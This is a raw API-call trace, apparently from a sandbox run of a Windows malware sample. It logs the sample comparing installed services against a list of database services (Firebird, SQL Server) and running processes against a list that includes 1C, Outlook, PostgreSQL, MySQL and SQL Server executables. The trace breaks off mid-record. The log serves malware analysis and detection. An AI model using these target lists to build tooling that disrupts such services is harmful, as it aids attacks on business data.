[0054.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.124] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0054.124] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0054.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0054.124] lstrlenW (lpString="AudioSrv") returned 8 [0054.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0054.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0054.124] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0054.124] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0054.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0054.125] lstrlenW (lpString="BFE") returned 3 [0054.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0054.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0054.125] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0054.125] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0054.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0054.125] lstrlenW (lpString="CryptSvc") returned 8 [0054.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0054.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0054.125] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0054.125] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0054.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0054.125] lstrlenW (lpString="CscService") returned 10 [0054.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0054.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0054.125] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0054.125] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0054.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0054.125] lstrlenW (lpString="DcomLaunch") returned 10 [0054.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.125] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0054.125] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0054.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0054.125] lstrlenW (lpString="Dhcp") returned 4 [0054.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0054.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0054.125] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0054.125] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0054.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0054.125] lstrlenW (lpString="Dnscache") returned 8 [0054.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0054.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0054.125] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0054.126] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0054.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0054.126] lstrlenW (lpString="DPS") returned 3 [0054.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0054.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0054.126] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0054.126] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0054.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0054.126] lstrlenW (lpString="eventlog") returned 8 [0054.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0054.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0054.126] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0054.126] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0054.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0054.126] lstrlenW (lpString="EventSystem") returned 11 [0054.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0054.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0054.126] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0054.126] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0054.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0054.126] lstrlenW (lpString="gpsvc") returned 5 [0054.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0054.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0054.126] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0054.126] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0054.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0054.126] lstrlenW (lpString="iphlpsvc") returned 8 [0054.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.126] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0054.126] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0054.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0054.126] lstrlenW (lpString="LanmanServer") returned 12 [0054.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0054.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0054.127] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0054.127] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0054.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0054.128] lstrlenW (lpString="LanmanWorkstation") returned 17 [0054.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.130] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0054.130] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0054.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0054.130] lstrlenW (lpString="lmhosts") returned 7 [0054.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0054.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0054.130] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0054.130] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0054.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0054.130] lstrlenW (lpString="MMCSS") returned 5 [0054.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0054.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0054.130] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0054.130] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0054.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0054.130] lstrlenW (lpString="MpsSvc") returned 6 [0054.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0054.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0054.130] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0054.130] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0054.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0054.130] lstrlenW (lpString="Netman") returned 6 [0054.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0054.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0054.131] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0054.131] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0054.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0054.131] lstrlenW (lpString="netprofm") returned 8 [0054.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0054.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0054.131] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0054.131] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0054.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0054.131] lstrlenW (lpString="NlaSvc") returned 6 [0054.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0054.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0054.131] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0054.131] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0054.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0054.131] lstrlenW (lpString="nsi") returned 3 [0054.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0054.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0054.131] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0054.131] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0054.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0054.131] lstrlenW (lpString="PcaSvc") returned 6 [0054.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0054.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0054.131] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0054.131] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0054.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0054.131] lstrlenW (lpString="PlugPlay") returned 8 [0054.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0054.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0054.131] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0054.131] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0054.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0054.131] lstrlenW (lpString="Power") returned 5 [0054.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0054.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0054.132] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0054.132] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0054.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0054.132] lstrlenW (lpString="ProfSvc") returned 7 [0054.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0054.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0054.132] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0054.132] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0054.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0054.132] lstrlenW (lpString="RpcEptMapper") returned 12 [0054.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.132] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0054.132] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0054.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0054.132] lstrlenW (lpString="RpcSs") returned 5 [0054.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0054.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0054.132] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0054.132] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0054.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0054.132] lstrlenW (lpString="SamSs") returned 5 [0054.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0054.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0054.132] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0054.132] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0054.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0054.132] lstrlenW (lpString="Schedule") returned 8 [0054.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0054.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0054.132] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0054.132] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0054.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0054.132] lstrlenW (lpString="SENS") returned 4 [0054.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0054.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0054.133] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0054.133] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0054.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0054.133] lstrlenW (lpString="ShellHWDetection") returned 16 [0054.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.133] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0054.133] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0054.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0054.133] lstrlenW (lpString="Spooler") returned 7 [0054.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0054.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0054.135] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0054.135] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0054.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0054.135] lstrlenW (lpString="swprv") returned 5 [0054.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0054.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0054.135] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0054.135] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0054.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0054.135] lstrlenW (lpString="SysMain") returned 7 [0054.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0054.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0054.135] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0054.135] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0054.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0054.135] lstrlenW (lpString="Themes") returned 6 [0054.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0054.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0054.135] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0054.135] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0054.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0054.135] lstrlenW (lpString="TrkWks") returned 6 [0054.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0054.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0054.135] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0054.135] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0054.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0054.135] lstrlenW (lpString="UxSms") returned 5 [0054.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0054.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0054.135] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0054.135] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0054.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0054.135] lstrlenW (lpString="VSS") returned 3 [0054.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0054.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0054.136] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0054.136] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0054.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0054.136] lstrlenW (lpString="WdiServiceHost") returned 14 [0054.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.136] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0054.136] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0054.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0054.136] lstrlenW (lpString="WdiSystemHost") returned 13 [0054.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.136] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0054.136] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0054.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0054.136] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0054.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.136] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0054.136] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0054.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0054.136] lstrlenW (lpString="Winmgmt") returned 7 [0054.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0054.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0054.136] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0054.136] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0054.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0054.136] lstrlenW (lpString="WPDBusEnum") returned 10 [0054.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.136] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0054.136] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0054.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0054.136] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0054.136] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0054.142] Process32FirstW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.142] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.143] lstrlenW (lpString="System") returned 6 [0054.143] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0054.143] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0054.143] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0054.143] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0054.143] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0054.143] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0054.143] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0054.143] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.143] lstrlenW (lpString="smss.exe") returned 8 [0054.143] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0054.144] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0054.144] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0054.144] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0054.144] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0054.144] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0054.144] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0054.144] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.145] lstrlenW (lpString="csrss.exe") returned 9 [0054.145] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0054.145] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0054.145] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0054.146] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0054.146] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0054.146] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0054.146] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0054.146] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.146] lstrlenW (lpString="wininit.exe") returned 11 [0054.146] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0054.146] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0054.146] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0054.146] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.147] lstrlenW (lpString="csrss.exe") returned 9 [0054.147] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.148] lstrlenW (lpString="winlogon.exe") returned 12 [0054.148] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.148] lstrlenW (lpString="services.exe") returned 12 [0054.148] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.149] lstrlenW (lpString="lsass.exe") returned 9 [0054.149] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0054.150] lstrlenW (lpString="lsm.exe") returned 7 [0054.150] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, 